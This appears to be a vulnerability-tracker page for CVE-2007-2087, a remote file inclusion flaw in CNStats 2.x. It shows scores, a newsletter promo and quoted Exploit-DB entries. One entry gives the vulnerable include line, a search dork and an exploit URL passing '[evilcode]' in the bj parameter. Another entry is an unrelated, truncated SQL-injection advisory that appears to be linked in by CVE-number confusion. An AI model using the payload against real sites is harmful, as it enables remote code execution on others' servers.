CVE-2007-2087
published 2007-04-18CVE-2007-2087: Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to…
PriorityP434medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.92%
77.3th percentile
Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cnstats | cnstats | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Softbiz Web Host Directory Script - 'host_id' SQL Injection
exploitdb·2008-04-28
CVE-2008-2087 Softbiz Web Host Directory Script - 'host_id' SQL Injection
Softbiz Web Host Directory Script - 'host_id' SQL Injection
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_89$2008
[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : April, 28 th 2007
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv89-K-159-2008.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Softbiz Web Host Directory Script
version : unknown
Vendor : http://www.softbizscripts.com/web-hosting-directory-script.php
Description :
Web Ho
Exploit-DB
CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion
exploitdb·2007-04-15
CVE-2007-2087 CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion
CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion
---
CNStats 2.9 (who_r.php) Remote File Include Vulnerability
# Scripts : CNStats 2.9
# Discovered By : irvian
# scripts site : http://www.cnstats.com/
# dork : "CNStats 2.9"
bug found:
/reports/who_r.php
/reports/who_s.php
$bk = 't';
include $bj . 'reports/who.php';
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]
# milw0rm.com [2007-04-15]
No writeups or analysis indexed.
2007-04-18
Published